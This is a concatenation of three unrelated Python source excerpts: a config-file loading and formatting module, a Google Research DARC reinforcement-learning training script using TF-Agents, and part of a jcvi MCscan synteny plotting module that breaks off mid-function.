    description = _INITIAL_HELP.strip() % {'versions': '\n# '.join(versions)}
    return description + '\n\n' + _format(config, {}, schemas, False, True)
def _load(files, defaults, overrides):
    """Read config into a raw ``{section: {key: value}}`` dict.

    :param files: config file paths to try to read, in order
    :param defaults: default config documents (bytes or unicode strings)
    :param overrides: ``(section, key, value)`` tuples applied last
    """
    parser = configparser.RawConfigParser()

    # Note: Python 2 code path -- `unicode` and `readfp` are Py2-isms.
    files = [path.expand_path(f) for f in files]
    sources = ['builtin defaults'] + files + ['command line options']
    logger.info('Loading config from: %s', ', '.join(sources))

    # TODO: simply return path to config file for defaults so we can load it
    # all in the same way?
    for default in defaults:
        if isinstance(default, unicode):
            default = default.encode('utf-8')
        parser.readfp(io.BytesIO(default))

    # Load config from a series of config files
    for filename in files:
        try:
            with io.open(filename, 'rb') as filehandle:
                parser.readfp(filehandle)
        except configparser.MissingSectionHeaderError as e:
            logger.warning('%s does not have a config section, not loaded.',
                           filename)
        except configparser.ParsingError as e:
            linenos = ', '.join(str(lineno) for lineno, line in e.errors)
            logger.warning(
                '%s has errors, line %s has been ignored.', filename, linenos)
        except IOError:
            # TODO: if this is the initial load of logging config we might not
            # have a logger at this point, we might want to handle this better.
            logger.debug('Config file %s not found; skipping', filename)

    # If there have been parse errors there is a python bug that causes the
    # values to be lists, this little trick coerces these into strings.
    parser.readfp(io.BytesIO())

    raw_config = {}
    for section in parser.sections():
        raw_config[section] = dict(parser.items(section))

    # Overrides (keyring values and command-line options) win over any
    # value read from defaults or files.
    for section, key, value in overrides:
        raw_config.setdefault(section, {})[key] = value

    return raw_config
def _validate(raw_config, schemas):
# Get validated config
config = {}
errors = {}
for schema in schemas:
values = raw_config.get(schema.name, {})
result, error = schema.deserialize(values)
if error:
errors[schema.name] = error
if result:
config[schema.name] = result
return config, errors
def _format(config, comments, schemas, display, disable):
    """Serialize *config* to INI-style bytes in schema order.

    :param config: validated config dict keyed by section name
    :param comments: dict of dicts mapping section/key to a comment string
    :param schemas: schemas defining section ordering and serialization
    :param display: passed to schema.serialize (masks secrets for display)
    :param disable: if True, comment out every emitted line
    """
    output = []
    for schema in schemas:
        serialized = schema.serialize(
            config.get(schema.name, {}), display=display)
        if not serialized:
            continue
        output.append(b'[%s]' % bytes(schema.name))
        for key, value in serialized.items():
            # NOTE(review): `types` is expected to arrive via the star
            # imports above -- confirm it resolves at runtime.
            if isinstance(value, types.DeprecatedValue):
                continue
            comment = bytes(comments.get(schema.name, {}).get(key, ''))
            output.append(b'%s =' % bytes(key))
            if value is not None:
                output[-1] += b' ' + value
            if comment:
                # INI inline-comment syntax: "key = value ; Comment"
                output[-1] += b' ; ' + comment.capitalize()
            if disable:
                # Prefix every line of the entry with '#' (multi-line safe)
                output[-1] = re.sub(r'^', b'#', output[-1], flags=re.M)
        # Blank line between sections; final strip() trims the last one.
        output.append(b'')
    return b'\n'.join(output).strip()
def _preprocess(config_string):
"""Convert a raw config into a form that preserves comments etc."""
results = ['[__COMMENTS__]']
counter = itertools.count(0)
section_re = re.compile(r'^(\[[^\]]+\])\s*(.+)$')
blank_line_re = re.compile(r'^\s*$')
comment_re = re.compile(r'^(#|;)')
inline_comment_re = re.compile(r' ;')
def newlines(match):
return '__BLANK%d__ =' % next(counter)
def comments(match):
if match.group(1) == '#':
return '__HASH%d__ =' % next(counter)
elif match.group(1) == ';':
return '__SEMICOLON%d__ =' % next(counter)
def inlinecomments(match):
return '\n__INLINE%d__ =' % next(counter)
def sections(match):
return '%s\n__SECTION%d__ = %s' % (
match.group(1), next(counter), match.group(2))
for line in config_string.splitlines():
line = blank_line_re.sub(newlines, line)
line = section_re.sub(sections, line)
line = comment_re.sub(comments, line)
line = inline_comment_re.sub(inlinecomments, line)
results.append(line)
return '\n'.join(results)
def _postprocess(config_string):
"""Converts a preprocessed config back to original form."""
flags = re.IGNORECASE | re.MULTILINE
result = re.sub(r'^\[__COMMENTS__\](\n|$)', '', config_string, flags=flags)
result = re.sub(r'\n__INLINE\d+__ =(.*)$', ' ;\g<1>', result, flags=flags)
result = re.sub(r'^__HASH\d+__ =(.*)$', '#\g<1>', result, flags=flags)
result = re.sub(r'^__SEMICOLON\d+__ =(.*)$', ';\g<1>', result, flags=flags)
result = re.sub(r'\n__SECTION\d+__ =(.*)$', '\g<1>', result, flags=flags)
result = re.sub(r'^__BLANK\d+__ =$', '', result, flags=flags)
return result
class Proxy(collections.Mapping):
    # Read-only mapping view over a config dict. Nested dicts are wrapped
    # in Proxy on access, so the whole tree is immutable through the
    # mapping interface. (Py2 code: on Python 3.10+ the ABC lives at
    # collections.abc.Mapping.)
    def __init__(self, data):
        self._data = data

    def __getitem__(self, key):
        item = self._data.__getitem__(key)
        if isinstance(item, dict):
            # Wrap nested sections so they are read-only too.
            return Proxy(item)
        return item

    def __iter__(self):
        return self._data.__iter__()

    def __len__(self):
        return self._data.__len__()

    def __repr__(self):
        # Py2 bytes formatting: b'...' is str under Python 2.
        return b'Proxy(%r)' % self._data
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main training script. See README.md for usage instructions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import time
from absl import app
from absl import flags
from absl import logging
import classifiers
import darc_agent
import darc_envs
import gin
import numpy as np
from six.moves import range
import tensorflow as tf
from tf_agents.agents.ddpg import critic_network
from tf_agents.agents.sac import tanh_normal_projection_network
from tf_agents.drivers import dynamic_step_driver
from tf_agents.eval import metric_utils
from tf_agents.metrics import tf_metrics
from tf_agents.networks import actor_distribution_network
from tf_agents.policies import greedy_policy
from tf_agents.policies import random_tf_policy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from tf_agents.utils import common
# Command-line flags: output location and gin configuration to load.
flags.DEFINE_string(
    "root_dir",
    None,
    "Root directory for writing logs/summaries/checkpoints.",
)
flags.DEFINE_multi_string("gin_file", None, "Path to the trainer config files.")
flags.DEFINE_multi_string("gin_bindings", None, "Gin binding to pass through.")

FLAGS = flags.FLAGS
@gin.configurable
def train_eval(
    root_dir,
    environment_name="broken_reacher",
    num_iterations=1000000,
    actor_fc_layers=(256, 256),
    critic_obs_fc_layers=None,
    critic_action_fc_layers=None,
    critic_joint_fc_layers=(256, 256),
    initial_collect_steps=10000,
    real_initial_collect_steps=10000,
    collect_steps_per_iteration=1,
    real_collect_interval=10,
    replay_buffer_capacity=1000000,
    # Params for target update
    target_update_tau=0.005,
    target_update_period=1,
    # Params for train
    train_steps_per_iteration=1,
    batch_size=256,
    actor_learning_rate=3e-4,
    critic_learning_rate=3e-4,
    classifier_learning_rate=3e-4,
    alpha_learning_rate=3e-4,
    td_errors_loss_fn=tf.math.squared_difference,
    gamma=0.99,
    reward_scale_factor=0.1,
    gradient_clipping=None,
    use_tf_functions=True,
    # Params for eval
    num_eval_episodes=30,
    eval_interval=10000,
    # Params for summaries and logging
    train_checkpoint_interval=10000,
    policy_checkpoint_interval=5000,
    rb_checkpoint_interval=50000,
    log_interval=1000,
    summary_interval=1000,
    summaries_flush_secs=10,
    debug_summaries=True,
    summarize_grads_and_vars=False,
    train_on_real=False,
    delta_r_warmup=0,
    random_seed=0,
    checkpoint_dir=None,
):
  """A simple train and eval for SAC.

  Builds a DarcAgent with two replay buffers (one fed from the "sim"
  environment, one from "real"), interleaves collection from both, trains
  on batches drawn from both, and periodically evaluates the greedy policy
  on the "sim" and "real" environment variants.

  Returns:
    The train_loss from the final training step.
  """
  np.random.seed(random_seed)
  tf.random.set_seed(random_seed)
  root_dir = os.path.expanduser(root_dir)
  train_dir = os.path.join(root_dir, "train")
  eval_dir = os.path.join(root_dir, "eval")

  train_summary_writer = tf.compat.v2.summary.create_file_writer(
      train_dir, flush_millis=summaries_flush_secs * 1000)
  train_summary_writer.set_as_default()

  eval_summary_writer = tf.compat.v2.summary.create_file_writer(
      eval_dir, flush_millis=summaries_flush_secs * 1000)

  # Map the environment name to a factory taking a "sim"/"real" mode.
  if environment_name == "broken_reacher":
    get_env_fn = darc_envs.get_broken_reacher_env
  elif environment_name == "half_cheetah_obstacle":
    get_env_fn = darc_envs.get_half_cheetah_direction_env
  elif environment_name.startswith("broken_joint"):
    base_name = environment_name.split("broken_joint_")[1]
    get_env_fn = functools.partial(
        darc_envs.get_broken_joint_env, env_name=base_name)
  elif environment_name.startswith("falling"):
    base_name = environment_name.split("falling_")[1]
    get_env_fn = functools.partial(
        darc_envs.get_falling_env, env_name=base_name)
  else:
    raise NotImplementedError("Unknown environment: %s" % environment_name)

  # The greedy policy is always evaluated on both environment variants.
  eval_name_list = ["sim", "real"]
  eval_env_list = [get_env_fn(mode) for mode in eval_name_list]

  eval_metrics_list = []
  for name in eval_name_list:
    eval_metrics_list.append([
        tf_metrics.AverageReturnMetric(
            buffer_size=num_eval_episodes, name="AverageReturn_%s" % name),
    ])

  global_step = tf.compat.v1.train.get_or_create_global_step()
  with tf.compat.v2.summary.record_if(
      lambda: tf.math.equal(global_step % summary_interval, 0)):
    tf_env_real = get_env_fn("real")
    if train_on_real:
      tf_env = get_env_fn("real")
    else:
      tf_env = get_env_fn("sim")

    time_step_spec = tf_env.time_step_spec()
    observation_spec = time_step_spec.observation
    action_spec = tf_env.action_spec()

    actor_net = actor_distribution_network.ActorDistributionNetwork(
        observation_spec,
        action_spec,
        fc_layer_params=actor_fc_layers,
        continuous_projection_net=(
            tanh_normal_projection_network.TanhNormalProjectionNetwork),
    )
    critic_net = critic_network.CriticNetwork(
        (observation_spec, action_spec),
        observation_fc_layer_params=critic_obs_fc_layers,
        action_fc_layer_params=critic_action_fc_layers,
        joint_fc_layer_params=critic_joint_fc_layers,
        kernel_initializer="glorot_uniform",
        last_kernel_initializer="glorot_uniform",
    )

    # The classifier distinguishes sim from real transitions; DarcAgent
    # uses it for its reward correction.
    classifier = classifiers.build_classifier(observation_spec, action_spec)

    tf_agent = darc_agent.DarcAgent(
        time_step_spec,
        action_spec,
        actor_network=actor_net,
        critic_network=critic_net,
        classifier=classifier,
        actor_optimizer=tf.compat.v1.train.AdamOptimizer(
            learning_rate=actor_learning_rate),
        critic_optimizer=tf.compat.v1.train.AdamOptimizer(
            learning_rate=critic_learning_rate),
        classifier_optimizer=tf.compat.v1.train.AdamOptimizer(
            learning_rate=classifier_learning_rate),
        alpha_optimizer=tf.compat.v1.train.AdamOptimizer(
            learning_rate=alpha_learning_rate),
        target_update_tau=target_update_tau,
        target_update_period=target_update_period,
        td_errors_loss_fn=td_errors_loss_fn,
        gamma=gamma,
        reward_scale_factor=reward_scale_factor,
        gradient_clipping=gradient_clipping,
        debug_summaries=debug_summaries,
        summarize_grads_and_vars=summarize_grads_and_vars,
        train_step_counter=global_step,
    )
    tf_agent.initialize()

    # Make the replay buffer.
    replay_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
        data_spec=tf_agent.collect_data_spec,
        batch_size=1,
        max_length=replay_buffer_capacity,
    )
    replay_observer = [replay_buffer.add_batch]

    # Second buffer for real-environment experience.
    real_replay_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
        data_spec=tf_agent.collect_data_spec,
        batch_size=1,
        max_length=replay_buffer_capacity,
    )
    real_replay_observer = [real_replay_buffer.add_batch]

    sim_train_metrics = [
        tf_metrics.NumberOfEpisodes(name="NumberOfEpisodesSim"),
        tf_metrics.EnvironmentSteps(name="EnvironmentStepsSim"),
        tf_metrics.AverageReturnMetric(
            buffer_size=num_eval_episodes,
            batch_size=tf_env.batch_size,
            name="AverageReturnSim",
        ),
        tf_metrics.AverageEpisodeLengthMetric(
            buffer_size=num_eval_episodes,
            batch_size=tf_env.batch_size,
            name="AverageEpisodeLengthSim",
        ),
    ]
    real_train_metrics = [
        tf_metrics.NumberOfEpisodes(name="NumberOfEpisodesReal"),
        tf_metrics.EnvironmentSteps(name="EnvironmentStepsReal"),
        tf_metrics.AverageReturnMetric(
            buffer_size=num_eval_episodes,
            batch_size=tf_env.batch_size,
            name="AverageReturnReal",
        ),
        tf_metrics.AverageEpisodeLengthMetric(
            buffer_size=num_eval_episodes,
            batch_size=tf_env.batch_size,
            name="AverageEpisodeLengthReal",
        ),
    ]

    eval_policy = greedy_policy.GreedyPolicy(tf_agent.policy)
    initial_collect_policy = random_tf_policy.RandomTFPolicy(
        tf_env.time_step_spec(), tf_env.action_spec())
    collect_policy = tf_agent.collect_policy

    train_checkpointer = common.Checkpointer(
        ckpt_dir=train_dir,
        agent=tf_agent,
        global_step=global_step,
        metrics=metric_utils.MetricsGroup(
            sim_train_metrics + real_train_metrics, "train_metrics"),
    )
    policy_checkpointer = common.Checkpointer(
        ckpt_dir=os.path.join(train_dir, "policy"),
        policy=eval_policy,
        global_step=global_step,
    )
    rb_checkpointer = common.Checkpointer(
        ckpt_dir=os.path.join(train_dir, "replay_buffer"),
        max_to_keep=1,
        replay_buffer=(replay_buffer, real_replay_buffer),
    )

    if checkpoint_dir is not None:
      # Warm-start the agent from an explicit external checkpoint rather
      # than whatever is in train_dir.
      checkpoint_path = tf.train.latest_checkpoint(checkpoint_dir)
      assert checkpoint_path is not None
      train_checkpointer._load_status = train_checkpointer._checkpoint.restore(  # pylint: disable=protected-access
          checkpoint_path)
      train_checkpointer._load_status.initialize_or_restore()  # pylint: disable=protected-access
    else:
      train_checkpointer.initialize_or_restore()
    rb_checkpointer.initialize_or_restore()

    if replay_buffer.num_frames() == 0:
      # NOTE(review): the initial-collect drivers are only defined in this
      # branch, but are referenced unconditionally in the
      # `use_tf_functions` block below -- presumably resuming from a
      # non-empty replay buffer would raise NameError there; confirm
      # before relying on resume.
      initial_collect_driver = dynamic_step_driver.DynamicStepDriver(
          tf_env,
          initial_collect_policy,
          observers=replay_observer + sim_train_metrics,
          num_steps=initial_collect_steps,
      )
      real_initial_collect_driver = dynamic_step_driver.DynamicStepDriver(
          tf_env_real,
          initial_collect_policy,
          observers=real_replay_observer + real_train_metrics,
          num_steps=real_initial_collect_steps,
      )

    collect_driver = dynamic_step_driver.DynamicStepDriver(
        tf_env,
        collect_policy,
        observers=replay_observer + sim_train_metrics,
        num_steps=collect_steps_per_iteration,
    )
    real_collect_driver = dynamic_step_driver.DynamicStepDriver(
        tf_env_real,
        collect_policy,
        observers=real_replay_observer + real_train_metrics,
        num_steps=collect_steps_per_iteration,
    )

    # Record the fully-resolved gin config next to the run artifacts.
    config_str = gin.operative_config_str()
    logging.info(config_str)
    with tf.compat.v1.gfile.Open(os.path.join(root_dir, "operative.gin"),
                                 "w") as f:
      f.write(config_str)

    if use_tf_functions:
      initial_collect_driver.run = common.function(initial_collect_driver.run)
      real_initial_collect_driver.run = common.function(
          real_initial_collect_driver.run)
      collect_driver.run = common.function(collect_driver.run)
      real_collect_driver.run = common.function(real_collect_driver.run)
      tf_agent.train = common.function(tf_agent.train)

    # Collect initial replay data.
    if replay_buffer.num_frames() == 0:
      logging.info(
          "Initializing replay buffer by collecting experience for %d steps with "
          "a random policy.",
          initial_collect_steps,
      )
      initial_collect_driver.run()
      real_initial_collect_driver.run()

    # Baseline evaluation before any training.
    for eval_name, eval_env, eval_metrics in zip(eval_name_list, eval_env_list,
                                                 eval_metrics_list):
      metric_utils.eager_compute(
          eval_metrics,
          eval_env,
          eval_policy,
          num_episodes=num_eval_episodes,
          train_step=global_step,
          summary_writer=eval_summary_writer,
          summary_prefix="Metrics-%s" % eval_name,
      )
      metric_utils.log_metrics(eval_metrics)

    time_step = None
    real_time_step = None
    policy_state = collect_policy.get_initial_state(tf_env.batch_size)
    timed_at_step = global_step.numpy()
    time_acc = 0

    # Prepare replay buffer as dataset with invalid transitions filtered.
    def _filter_invalid_transition(trajectories, unused_arg1):
      return ~trajectories.is_boundary()[0]

    dataset = (
        replay_buffer.as_dataset(
            sample_batch_size=batch_size, num_steps=2).unbatch().filter(
                _filter_invalid_transition).batch(batch_size).prefetch(5))
    real_dataset = (
        real_replay_buffer.as_dataset(
            sample_batch_size=batch_size, num_steps=2).unbatch().filter(
                _filter_invalid_transition).batch(batch_size).prefetch(5))

    # Dataset generates trajectories with shape [Bx2x...]
    iterator = iter(dataset)
    real_iterator = iter(real_dataset)

    def train_step():
      # One gradient update on a sim batch plus a real batch.
      experience, _ = next(iterator)
      real_experience, _ = next(real_iterator)
      return tf_agent.train(experience, real_experience=real_experience)

    if use_tf_functions:
      train_step = common.function(train_step)

    for _ in range(num_iterations):
      start_time = time.time()
      time_step, policy_state = collect_driver.run(
          time_step=time_step,
          policy_state=policy_state,
      )
      assert not policy_state  # We expect policy_state == ().
      # Real experience is collected less often, and only after warmup.
      if (global_step.numpy() % real_collect_interval == 0 and
          global_step.numpy() >= delta_r_warmup):
        real_time_step, policy_state = real_collect_driver.run(
            time_step=real_time_step,
            policy_state=policy_state,
        )

      for _ in range(train_steps_per_iteration):
        train_loss = train_step()
      time_acc += time.time() - start_time

      global_step_val = global_step.numpy()

      if global_step_val % log_interval == 0:
        logging.info("step = %d, loss = %f", global_step_val, train_loss.loss)
        steps_per_sec = (global_step_val - timed_at_step) / time_acc
        logging.info("%.3f steps/sec", steps_per_sec)
        tf.compat.v2.summary.scalar(
            name="global_steps_per_sec", data=steps_per_sec, step=global_step)
        timed_at_step = global_step_val
        time_acc = 0

      for train_metric in sim_train_metrics:
        train_metric.tf_summaries(
            train_step=global_step, step_metrics=sim_train_metrics[:2])
      for train_metric in real_train_metrics:
        train_metric.tf_summaries(
            train_step=global_step, step_metrics=real_train_metrics[:2])

      if global_step_val % eval_interval == 0:
        for eval_name, eval_env, eval_metrics in zip(eval_name_list,
                                                     eval_env_list,
                                                     eval_metrics_list):
          metric_utils.eager_compute(
              eval_metrics,
              eval_env,
              eval_policy,
              num_episodes=num_eval_episodes,
              train_step=global_step,
              summary_writer=eval_summary_writer,
              summary_prefix="Metrics-%s" % eval_name,
          )
          metric_utils.log_metrics(eval_metrics)

      if global_step_val % train_checkpoint_interval == 0:
        train_checkpointer.save(global_step=global_step_val)

      if global_step_val % policy_checkpoint_interval == 0:
        policy_checkpointer.save(global_step=global_step_val)

      if global_step_val % rb_checkpoint_interval == 0:
        rb_checkpointer.save(global_step=global_step_val)
    return train_loss
def main(_):
  """Entry point: enable TF2 behavior, load gin configs, run training."""
  tf.compat.v1.enable_v2_behavior()
  logging.set_verbosity(logging.INFO)
  gin.parse_config_files_and_bindings(FLAGS.gin_file, FLAGS.gin_bindings)
  train_eval(FLAGS.root_dir)


if __name__ == "__main__":
  flags.mark_flag_as_required("root_dir")
  app.run(main)
| |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
%prog mcscan.txt all.bed layout.csv
Illustrate MCscan multiple collinearity alignments. Use layout.csv to indicate
the positions of tracks. For example:
#x, y, rotation, ha, va, color, ratio
0.5, 0.6, 0, left, center, g
0.25, 0.7, 45, center, center, m
With the row ordering corresponding to the column ordering in the MCscan output.
For "ha" (horizontal alignment), accepted values are: left|right|leftalign|rightalign|center|""(empty)
For "va" (vertical alignment), accepted values are: top|bottom|center|""(empty)
"""
import sys
import logging
import numpy as np
from typing import Optional
from jcvi.compara.synteny import BlockFile
from jcvi.formats.bed import Bed
from jcvi.formats.base import DictFile
from jcvi.utils.cbook import human_size
from jcvi.utils.validator import validate_in_choices, validate_in_range
from jcvi.apps.base import OptionParser
from jcvi.graphics.glyph import (
BasePalette,
Glyph,
OrientationPalette,
OrthoGroupPalette,
RoundLabel,
)
from jcvi.graphics.base import (
markup,
mpl,
plt,
savefig,
Path,
PathPatch,
AbstractLayout,
)
# Accepted values for the layout "ha" (horizontal alignment) column.
HorizontalAlignments = ("left", "right", "leftalign", "rightalign", "center", "")
# Accepted values for the layout "va" (vertical alignment) column.
VerticalAlignments = ("top", "bottom", "center", "")
# Fraction of the figure width allotted to the widest track.
CanvasSize = 0.65
class LayoutLine(object):
    """One parsed row of the layout CSV, describing a single track."""

    def __init__(self, row, delimiter=","):
        # A leading "*" marks the track as hidden (parsed but not drawn).
        self.hidden = row[0] == "*"
        if self.hidden:
            row = row[1:]
        fields = [field.strip() for field in row.rstrip().split(delimiter)]
        self.x = float(fields[0])
        validate_in_range(self.x, 0, 1, "XPosition(x) column")
        self.y = float(fields[1])
        validate_in_range(self.y, 0, 1, "YPosition(y) column")
        self.rotation = int(fields[2])
        self.ha = fields[3]
        validate_in_choices(
            self.ha, HorizontalAlignments, "HorizontaAlignment(ha) column"
        )
        self.va = fields[4]
        validate_in_choices(self.va, VerticalAlignments, "VerticalAlignment(va) column")
        self.color = fields[5]
        # Optional trailing columns: track scaling ratio and custom label.
        self.ratio = float(fields[6]) if len(fields) > 6 else 1
        self.label = fields[7].strip() if len(fields) > 7 else None
class Layout(AbstractLayout):
    """Parsed layout file: a list of LayoutLine tracks plus edge records."""

    def __init__(self, filename, delimiter=","):
        super(Layout, self).__init__(filename)
        fp = open(filename)
        self.edges = []
        for row in fp:
            if row[0] == "#":  # comment line
                continue
            if row[0] != "e":
                # Regular track line.
                self.append(LayoutLine(row, delimiter=delimiter))
                continue
            # Edge line: e, <track-a>, <track-b>[, color[, samearc]]
            fields = [field.strip() for field in row.rstrip().split(delimiter)]
            a, b = fields[1:3]
            blockcolor = fields[3] if len(fields) >= 4 and fields[3] else None
            samearc = fields[4] if len(fields) >= 5 and fields[4] else None
            a, b = int(a), int(b)
            assert fields[0] == "e"
            self.edges.append((a, b, blockcolor, samearc))
        self.assign_colors()
class Shade(object):
    # A syntenic wedge (shaded polygon) connecting segments on two tracks.
    Styles = ("curve", "line")

    def __init__(
        self,
        ax,
        a,
        b,
        ymid,
        highlight=False,
        style="curve",
        ec="k",
        fc="k",
        alpha=0.2,
        lw=1,
        zorder=1,
    ):
        """Create syntenic wedges between tracks.

        Args:
            ax: matplotlib Axes
            a (tuple of floats): ((start_x, start_y), (end_x, end_y))
            b (tuple of floats): ((start_x, start_y), (end_x, end_y))
            ymid (float): y-mid position for curve style only
            highlight (bool, optional): Plot this shade if color is specified. Defaults to False.
            style (str, optional): Style. Defaults to "curve", must be one of
                ("curve", "line")
            ec (str, optional): Edge color. Defaults to "k".
            fc (str, optional): Face color. Defaults to "k".
            alpha (float, optional): Transparency. Defaults to 0.2.
            lw (int, optional): Line width. Defaults to 1.
            zorder (int, optional): Z-order. Defaults to 1.
        """
        fc = fc or "gainsboro"  # Default block color is grayish
        assert style in self.Styles, "style must be one of {}".format(self.Styles)
        a1, a2 = a
        b1, b2 = b
        ax1, ay1 = a1
        ax2, ay2 = a2
        bx1, by1 = b1
        bx2, by2 = b2
        M, C4, L, CP = Path.MOVETO, Path.CURVE4, Path.LINETO, Path.CLOSEPOLY
        if style == "curve":
            # Two cubic Bezier sides routed through the shared ymid control
            # row give the wedge its smooth hourglass shape.
            pathdata = [
                (M, a1),
                (C4, (ax1, ymid)),
                (C4, (bx1, ymid)),
                (C4, b1),
                (L, b2),
                (C4, (bx2, ymid)),
                (C4, (ax2, ymid)),
                (C4, a2),
                (CP, a1),
            ]
        else:
            # Straight-sided quadrilateral between the two track segments.
            pathdata = [(M, a1), (L, b1), (L, b2), (L, a2), (CP, a1)]
        codes, verts = zip(*pathdata)
        path = Path(verts, codes)
        if highlight:
            # A truthy highlight value is itself the color to draw with.
            ec = fc = highlight
        pp = PathPatch(path, ec=ec, fc=fc, alpha=alpha, lw=lw, zorder=zorder)
        ax.add_patch(pp)
class Region(object):
    # Draws one track (a genomic region): the chromosome line, gene glyphs,
    # optional extra features, and the chr/location labels.
    def __init__(
        self,
        ax,
        ext,
        layout,
        bed,
        scale,
        switch=None,
        chr_label=True,
        loc_label=True,
        gene_labels: Optional[set] = None,
        genelabelsize=0,
        pad=0.05,
        vpad=0.015,
        extra_features=None,
        glyphstyle="box",
        glyphcolor: BasePalette = OrientationPalette(),
    ):
        x, y = layout.x, layout.y
        ratio = layout.ratio
        # Per-track ratio shrinks the scale, widening this track's span.
        scale /= ratio
        self.y = y
        lr = layout.rotation
        # Rotate the whole track around its anchor point (x, y).
        tr = mpl.transforms.Affine2D().rotate_deg_around(x, y, lr) + ax.transAxes
        inv = ax.transAxes.inverted()
        start, end, si, ei, chr, orientation, span = ext
        flank = span / scale / 2
        xstart, xend = x - flank, x + flank
        self.xstart, self.xend = xstart, xend

        # bp -> axes-x conversion; closes over `startbp`, which is assigned
        # below before `cv` is first called.
        cv = lambda t: xstart + abs(t - startbp) / scale
        hidden = layout.hidden

        # Chromosome
        if not hidden:
            ax.plot((xstart, xend), (y, y), color="gray", transform=tr, lw=2, zorder=1)

        self.genes = genes = bed[si : ei + 1]
        startbp, endbp = start.start, end.end
        if orientation == "-":
            # Flipped track: coordinates run right-to-left.
            startbp, endbp = endbp, startbp

        if switch:
            chr = switch.get(chr, chr)
        if layout.label:
            chr = layout.label

        # Location label, e.g. "1.23-4.56Mb".
        label = "-".join(
            (
                human_size(startbp, target="Mb", precision=2)[:-2],
                human_size(endbp, target="Mb", precision=2),
            )
        )

        height = 0.012
        self.gg = {}
        # Genes
        for g in genes:
            gstart, gend = g.start, g.end
            strand = g.strand
            if strand == "-":
                gstart, gend = gend, gstart
            if orientation == "-":
                # Flipped track also flips the displayed strand.
                strand = "+" if strand == "-" else "-"
            x1, x2, a, b = self.get_coordinates(gstart, gend, y, cv, tr, inv)
            gene_name = g.accn
            # Remember endpoint pairs so Synteny can draw shades later.
            self.gg[gene_name] = (a, b)
            color, zorder = (
                glyphcolor.get_color_and_zorder(strand)
                if isinstance(glyphcolor, OrientationPalette)
                else glyphcolor.get_color_and_zorder(gene_name)
            )

            if hidden:
                continue
            gp = Glyph(
                ax,
                x1,
                x2,
                y,
                height,
                gradient=False,
                fc=color,
                style=glyphstyle,
                zorder=zorder,
            )
            gp.set_transform(tr)
            # Optional per-gene text label (all genes, or only the requested set).
            if genelabelsize and (not gene_labels or gene_name in gene_labels):
                ax.text(
                    (x1 + x2) / 2,
                    y + height / 2 + genelabelsize * vpad / 3,
                    markup(gene_name),
                    size=genelabelsize,
                    rotation=25,
                    ha="left",
                    va="center",
                    color="lightslategray",
                )

        # Extra features (like repeats)
        if extra_features:
            for g in extra_features:
                gstart, gend = g.start, g.end
                x1, x2, a, b = self.get_coordinates(gstart, gend, y, cv, tr, inv)
                gp = Glyph(
                    ax,
                    x1,
                    x2,
                    y,
                    height * 3 / 4,
                    gradient=False,
                    fc="#ff7f00",
                    style=glyphstyle,
                    zorder=2,
                )
                gp.set_transform(tr)

        ha, va = layout.ha, layout.va

        # Resolve the label anchor position from the alignment keywords.
        hpad = 0.02
        if ha == "left":
            xx = xstart - hpad
            ha = "right"
        elif ha == "leftalign":
            xx = 0.5 - CanvasSize / 2 - hpad
            ha = "right"
        elif ha == "right":
            xx = xend + hpad
            ha = "left"
        elif ha == "rightalign":
            xx = 0.5 + CanvasSize / 2 + hpad
            ha = "left"
        else:
            xx = x
            ha = "center"

        # Tentative solution to labels stick into glyph
        magic = 40.0
        cc = abs(lr) / magic if abs(lr) > magic else 1
        if va == "top":
            yy = y + cc * pad
        elif va == "bottom":
            yy = y - cc * pad
        else:
            yy = y

        l = np.array((xx, yy))
        # Convert the layout rotation into display-space text rotation.
        trans_angle = ax.transAxes.transform_angles(np.array((lr,)), l.reshape((1, 2)))[
            0
        ]
        lx, ly = l
        if not hidden:
            bbox = dict(boxstyle="round", fc="w", ec="w", alpha=0.5)
            kwargs = dict(
                ha=ha, va="center", rotation=trans_angle, bbox=bbox, zorder=10
            )

            # TODO: I spent several hours on trying to make this work - with no
            # good solutions. To generate labels on multiple lines, each line
            # with a different style is difficult in matplotlib. The only way,
            # if you can tolerate an extra dot (.), is to use the recipe below.
            # chr_label = r"\noindent " + markup(chr) + r" \\ ." if chr_label else None
            # loc_label = r"\noindent . \\ " + label if loc_label else None
            chr_label = markup(chr) if chr_label else None
            loc_label = label if loc_label else None
            if chr_label:
                if loc_label:
                    ax.text(lx, ly + vpad, chr_label, color=layout.color, **kwargs)
                    ax.text(
                        lx,
                        ly - vpad,
                        loc_label,
                        color="lightslategrey",
                        size=10,
                        **kwargs,
                    )
                else:
                    ax.text(lx, ly, chr_label, color=layout.color, **kwargs)

    def get_coordinates(self, gstart, gend, y, cv, tr, inv):
        """Map bp coordinates to axes x-positions (x1, x2) and the rotated
        endpoint pairs (a, b) used when drawing shades between tracks."""
        x1, x2 = cv(gstart), cv(gend)
        a, b = tr.transform((x1, y)), tr.transform((x2, y))
        a, b = inv.transform(a), inv.transform(b)
        return x1, x2, a, b
class Synteny(object):
    # Top-level plot builder: draws every track (Region), the syntenic
    # shades between tracks, and the optional scale bar and trees.
    def __init__(
        self,
        fig,
        root,
        datafile,
        bedfile,
        layoutfile,
        switch=None,
        tree=None,
        extra_features=None,
        chr_label=True,
        loc_label=True,
        gene_labels: Optional[set] = None,
        genelabelsize=0,
        pad=0.05,
        vpad=0.015,
        scalebar=False,
        shadestyle="curve",
        glyphstyle="arrow",
        glyphcolor: BasePalette = OrientationPalette(),
    ):
        _, h = fig.get_figwidth(), fig.get_figheight()
        bed = Bed(bedfile)
        order = bed.order
        bf = BlockFile(datafile)
        self.layout = lo = Layout(layoutfile)
        switch = DictFile(switch, delimiter="\t") if switch else None
        if extra_features:
            extra_features = Bed(extra_features)

        # Compute the genomic extent of each column (track) first.
        exts = []
        extras = []
        for i in range(bf.ncols):
            ext = bf.get_extent(i, order)
            exts.append(ext)
            if extra_features:
                start, end, si, ei, chr, orientation, span = ext
